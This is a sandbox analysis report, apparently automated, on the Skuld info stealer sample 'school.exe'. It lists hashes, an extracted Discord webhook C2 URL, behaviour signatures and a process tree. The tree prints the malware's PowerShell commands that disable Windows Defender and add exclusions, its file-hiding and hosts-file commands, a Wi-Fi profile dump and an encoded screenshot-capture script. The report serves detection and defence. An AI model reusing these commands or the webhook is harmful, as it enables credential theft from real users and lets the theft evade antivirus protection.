Analysis

  • max time kernel
    232s
  • max time network
    204s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240704-en
  • resource tags

    arch:x64arch:x86image:win11-20240704-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    09-07-2024 04:21

General

  • Target

    school.exe

  • Size

    9.3MB

  • MD5

    df99beb55f643551ae73184125d723ec

  • SHA1

    9ea0ac60ec61a64dcb9eb21509b76ee8799434d5

  • SHA256

    e8692661ffd0327708f581369c56af975a541c6565b97af794c8b7adfa297c15

  • SHA512

    b5cf419550d3331cbc1ff32a78b9bcc4f5694bbf2de351bb4d6d6812d705726d5651306ce8a9ac7fec82ad3c3922228dc5c09e49daf5b65528b2e09a02227f98

  • SSDEEP

    98304:sS+tg/BozXxWs0XHvLHMx3TN0E1eCFayKyY90xfm:7/BozXezHMx3Tv1eCFayNxm

Malware Config

Extracted

Family

skuld

C2

https://discord.com/api/webhooks/1260084983779823679/oksd2KHzMyoQZqqI4MwVE2vLGUihg1S0E0LXatDcQ1i1lpnsAwy_F34SoeRwH1q5WmA8

Signatures

  • Skuld stealer

    An info stealer written in Go lang.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Detects videocard installed 1 TTPs 2 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 27 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\school.exe
    "C:\Users\Admin\AppData\Local\Temp\school.exe"
    1⤵
    • Drops file in Drivers directory
    • Adds Run key to start application
    • Maps connected drives based on registry
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4780
    • C:\Windows\system32\attrib.exe
      attrib +h +s C:\Users\Admin\AppData\Local\Temp\school.exe
      2⤵
      • Views/modifies file attributes
      PID:2076
    • C:\Windows\system32\attrib.exe
      attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
      2⤵
      • Views/modifies file attributes
      PID:2468
    • C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:472
    • C:\Windows\System32\Wbem\wmic.exe
      wmic path win32_VideoController get name
      2⤵
      • Detects videocard installed
      • Suspicious use of AdjustPrivilegeToken
      PID:1736
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\school.exe
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      PID:1916
    • C:\Windows\System32\Wbem\wmic.exe
      wmic os get Caption
      2⤵
        PID:3404
      • C:\Windows\System32\Wbem\wmic.exe
        wmic cpu get Name
        2⤵
          PID:5056
        • C:\Windows\System32\Wbem\wmic.exe
          wmic path win32_VideoController get name
          2⤵
          • Detects videocard installed
          PID:1136
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:2824
        • C:\Windows\System32\Wbem\wmic.exe
          wmic csproduct get UUID
          2⤵
            PID:2852
          • C:\Windows\system32\attrib.exe
            attrib -r C:\Windows\System32\drivers\etc\hosts
            2⤵
            • Drops file in Drivers directory
            • Views/modifies file attributes
            PID:440
          • C:\Windows\system32\attrib.exe
            attrib +r C:\Windows\System32\drivers\etc\hosts
            2⤵
            • Drops file in Drivers directory
            • Views/modifies file attributes
            PID:2552
          • C:\Windows\system32\netsh.exe
            netsh wlan show profiles
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:1712
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of WriteProcessMemory
            PID:4932
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\z2tv2bul\z2tv2bul.cmdline"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:5044
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA950.tmp" "c:\Users\Admin\AppData\Local\Temp\z2tv2bul\CSC5773B967F1984AAFB66FA26AAEF5ECA.TMP"
                4⤵
                  PID:3960
          • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
            "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
            1⤵
            • Modifies registry class
            • Suspicious use of SetWindowsHookEx
            PID:1132
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe"
            1⤵
            • Enumerates system info in registry
            • Modifies data under HKEY_USERS
            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:5040
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8829dab58,0x7ff8829dab68,0x7ff8829dab78
              2⤵
                PID:1596
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1496 --field-trial-handle=1784,i,12848271251643746718,9485593380326884454,131072 /prefetch:2
                2⤵
                  PID:1400
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=1784,i,12848271251643746718,9485593380326884454,131072 /prefetch:8
                  2⤵
                    PID:1180
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2200 --field-trial-handle=1784,i,12848271251643746718,9485593380326884454,131072 /prefetch:8
                    2⤵
                      PID:1640
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3040 --field-trial-handle=1784,i,12848271251643746718,9485593380326884454,131072 /prefetch:1
                      2⤵
                        PID:2492
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3124 --field-trial-handle=1784,i,12848271251643746718,9485593380326884454,131072 /prefetch:1
                        2⤵
                          PID:4148
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3484 --field-trial-handle=1784,i,12848271251643746718,9485593380326884454,131072 /prefetch:1
                          2⤵
                            PID:4596
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4616 --field-trial-handle=1784,i,12848271251643746718,9485593380326884454,131072 /prefetch:8
                            2⤵
                              PID:1368
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4776 --field-trial-handle=1784,i,12848271251643746718,9485593380326884454,131072 /prefetch:8
                              2⤵
                                PID:4160
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4740 --field-trial-handle=1784,i,12848271251643746718,9485593380326884454,131072 /prefetch:8
                                2⤵
                                  PID:676
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4764 --field-trial-handle=1784,i,12848271251643746718,9485593380326884454,131072 /prefetch:1
                                  2⤵
                                    PID:4692
                                • C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
                                  "C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
                                  1⤵
                                    PID:2704
                                  • C:\Users\Admin\AppData\Local\Temp\school.exe
                                    "C:\Users\Admin\AppData\Local\Temp\school.exe"
                                    1⤵
                                    • Executes dropped EXE
                                    PID:792
                                  • C:\Users\Admin\AppData\Local\Temp\school.exe
                                    "C:\Users\Admin\AppData\Local\Temp\school.exe"
                                    1⤵
                                    • Executes dropped EXE
                                    PID:1432

                                  Network

                                  MITRE ATT&CK Enterprise v15

                                  Replay Monitor

                                  Loading Replay Monitor...

                                  Downloads

                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                    Filesize

                                    384B

                                    MD5

                                    4098fb1479d339dfb707672a7e73957a

                                    SHA1

                                    805e687a049101cf14468f58b914d5a937fc5d3e

                                    SHA256

                                    4486fbea808ff0e995637072ffe14e2fee88ec72c9cc98b9140f3407ce74a37c

                                    SHA512

                                    8bd64e18e371ac5603cd41fc93eff36d8cb64ca8ccd4fd1ff192697fcf4de68b9b26d62818f5c2beeed2bea3fd9dc1a87212b9aaff4d264f967aeea21f6564c2

                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                    Filesize

                                    3KB

                                    MD5

                                    b5c5dfda49de6c3ca09c16c3660a149c

                                    SHA1

                                    7d2c65e232095b01b1f3f4c1a67e6b86c6b75d42

                                    SHA256

                                    35bf2fc15063719b734c166de08d9c89d4e86ce9a704e12dc1b8d8986831c0d2

                                    SHA512

                                    984e65bbe003b46b17eb3134417e5d038382067d7c40953b5e1b24e8c97c375bd21590ecdc1ae7d1e16b40386a03ccdc19329c4cf91303eb3a614fbd5019c16d

                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                    Filesize

                                    2B

                                    MD5

                                    d751713988987e9331980363e24189ce

                                    SHA1

                                    97d170e1550eee4afc0af065b78cda302a97674c

                                    SHA256

                                    4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                    SHA512

                                    b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                    Filesize

                                    857B

                                    MD5

                                    1cbae2272cf5ce6df6c75260d161a3c8

                                    SHA1

                                    3fa862eccc982bea764f2b464d1c50fd113b75e2

                                    SHA256

                                    f3e4c4cc37825eb5159ae9a3b8da989c4fe9788afe68d0a96c04c1bb80004f42

                                    SHA512

                                    41c6b6154819874f91857412d0ac80563f6b4d5563ba7c1fefb6e99cba9863665f7bc3c0f72cb85b144a6cda0d1f946b82f90798c3fa813dbaa47c97e9fea724

                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                    Filesize

                                    356B

                                    MD5

                                    d4ee2a1e9a50a5b69cd4dea4f571ab1b

                                    SHA1

                                    d18796be66f2f215e0562841f03694367f73ea03

                                    SHA256

                                    2147c06ab70073664f2529bd8227fd6ff50393d9c3df5b5d55d8b5eb6415dad6

                                    SHA512

                                    7b54ecec03499366ea860b08626c57a261821742ba8dfb14cdf9ac7d5a6ee1a2c0b07d745073dc5586197f0c9ce1dc02e67cdbfc0c3a67f564bec9028fd67808

                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                    Filesize

                                    7KB

                                    MD5

                                    147a0f648c265d2dec3dfd8bda33b448

                                    SHA1

                                    e447993f08b132cebbf0582a3dae9aa21b7e6377

                                    SHA256

                                    71701f3c31ad663000b556c999ed397e8d0cbecfe986ba3b46e2f3fe185d762e

                                    SHA512

                                    b6ac622da6198a2c4d884a9d5d2e6913b1362f4b167c9c0a6f9065b72f029cb921bdab0e39f43f55edd8b179f1eafa248f1817dcbfb3c07d0fac69d5b8a2cf6b

                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                    Filesize

                                    7KB

                                    MD5

                                    197acc725050846ec804b7177a8ba6f1

                                    SHA1

                                    53a16e186a04fc5eed15e1c744c1c1100644105c

                                    SHA256

                                    942c05cd8251bce314b24bbd0425d36c5c82df31957661161796be7c198c9ddc

                                    SHA512

                                    a485f25f6e37a1f5c4c08952aff96e7dc6d71f1fe6c07e1f176c588e5ed96d8afe40cae58c9ad1715506a40ec26588f41c1b35a669a543924f5ccb2f75d9b0fc

                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                    Filesize

                                    6KB

                                    MD5

                                    940859a61eff8237e90610bfc4e0b02c

                                    SHA1

                                    12324aaff2eef4b2eaa2d902f0cd8956bc3ce241

                                    SHA256

                                    2be40c875ed8f8139408591393eea19adb03fbbd7d23bf3506ab3dfb49caf31c

                                    SHA512

                                    1c7fb5e72626c0fbd24aab7cd13843a2aa152234cbd414d495685839c588cf1da28f2778803e0e21fbf4680c5f58a5a3cb052f9c0b38f7d629dd207d2668203a

                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                    Filesize

                                    16KB

                                    MD5

                                    e333311f9565b4d45be5e26fc0547c35

                                    SHA1

                                    d27088dd4fddd6822f2dbc47c3efa61dba4fa997

                                    SHA256

                                    a2d6684e1e8792bdec07addd6f96273e146f730ceb2fdcee03ad70b8e302824a

                                    SHA512

                                    19d22c3f964981951649838dd2825ec7da911ac643428c1da2d9323a759a6edd40320161ca9f2c99aa297a794c3fe6ffa1eaa6593d6ce2d2bb1c79bb4f38960f

                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                    Filesize

                                    285KB

                                    MD5

                                    968a0eedc1f85003eb5169ecf43feeec

                                    SHA1

                                    eb0a3d1d647d2e2fe3efba89405552ad8de105b8

                                    SHA256

                                    fa551dd28f77f51650fa6acadc1d28edb21e0a1b7f960c994660c1ffbe5ccf87

                                    SHA512

                                    d90a9fc6dbd46336cc8eb8c261adfd903f374501690979051cced1f5774108063df016d9e7cde5575be38d224c4f348c86a284eeaec1e303fe08c76f226df061

                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                    Filesize

                                    285KB

                                    MD5

                                    10f6d8683f1c793757d165c4b81c9ad9

                                    SHA1

                                    d318905df0febdbaf98811c56e15c64fe5e45f86

                                    SHA256

                                    2e403660d9df711a3da9b647f78baaba18d18c3e4b144bfab6a85f6d721bf4ac

                                    SHA512

                                    de5250d06c3a0a66904f4b371028ce2a0371e4a1c1e59ac008f1ef08c90f1943abf3c7cb70fdd3d333daef949c3d012a1c3dc5a9677cea5f4f6b079b8a5ef5cf

                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

                                    Filesize

                                    264KB

                                    MD5

                                    f50f89a0a91564d0b8a211f8921aa7de

                                    SHA1

                                    112403a17dd69d5b9018b8cede023cb3b54eab7d

                                    SHA256

                                    b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                                    SHA512

                                    bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                    Filesize

                                    2KB

                                    MD5

                                    627073ee3ca9676911bee35548eff2b8

                                    SHA1

                                    4c4b68c65e2cab9864b51167d710aa29ebdcff2e

                                    SHA256

                                    85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

                                    SHA512

                                    3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                    Filesize

                                    944B

                                    MD5

                                    e3840d9bcedfe7017e49ee5d05bd1c46

                                    SHA1

                                    272620fb2605bd196df471d62db4b2d280a363c6

                                    SHA256

                                    3ac83e70415b9701ee71a4560232d7998e00c3db020fde669eb01b8821d2746f

                                    SHA512

                                    76adc88ab3930acc6b8b7668e2de797b8c00edcfc41660ee4485259c72a8adf162db62c2621ead5a9950f12bfe8a76ccab79d02fda11860afb0e217812cac376

                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                    Filesize

                                    944B

                                    MD5

                                    781da0576417bf414dc558e5a315e2be

                                    SHA1

                                    215451c1e370be595f1c389f587efeaa93108b4c

                                    SHA256

                                    41a5aef8b0bbeea2766f40a7bba2c78322379f167c610f7055ccb69e7db030fe

                                    SHA512

                                    24e283aa30a2903ebe154dad49b26067a45e46fec57549ad080d3b9ec3f272044efaaed3822d067837f5521262192f466c47195ffe7f75f8c7c5dcf3159ea737

                                  • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

                                    Filesize

                                    10KB

                                    MD5

                                    00d55e92419b7a500fac6fbff94aeab6

                                    SHA1

                                    85c20b3b1230158f73d1da99f8cb539bd0f1b1bd

                                    SHA256

                                    4fb34ca1daed6bd2f358a2529dfe2d60c546c4c1bda5e9a7c61a65418f76d321

                                    SHA512

                                    cefb98597ece4f6f8802dca0c16fcc8812e523dcb7853ff15888ea125b87e3ae1436de10cd9c23e9bd3a5ce236273b6d9b07824bcb51432ae94708587810c521

                                  • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

                                    Filesize

                                    10KB

                                    MD5

                                    5660dec6d17c4d73cf0ccd78f7b8297b

                                    SHA1

                                    cb8a2e6d8f5e7e931867d284f97dc0dcf039baff

                                    SHA256

                                    771d63aaabf3443c385554c7ae6d1e64d35d5e82d6dffc42ee4808ae66716c8f

                                    SHA512

                                    2fc21e58402d35901911b13122e7a6903afb42613ee2477b72fc93e9e49dac148ef2859d62e8f799c79ca29a457ce6a94ba30bc7b94aa805ba1c7f2331182d70

                                  • C:\Users\Admin\AppData\Local\Temp\RESA950.tmp

                                    Filesize

                                    1KB

                                    MD5

                                    9a124a7328d081d796e1e936de0c1a6a

                                    SHA1

                                    71d3d31d40e24dbf7e793018cae001a0efb089a5

                                    SHA256

                                    7375566d8b2eaedcc451c801f04d0a52bd3fe040b899892c366eb9e5831a0224

                                    SHA512

                                    29b6022c2608a356db8fe2452564579332da3b38787d82135ca42730c54fd591542e61ba02cbfe7fe55982a2119699b09114123914790f83485d6bca0b7519c9

                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1bmicio2.ic4.ps1

                                    Filesize

                                    60B

                                    MD5

                                    d17fe0a3f47be24a6453e9ef58c94641

                                    SHA1

                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                    SHA256

                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                    SHA512

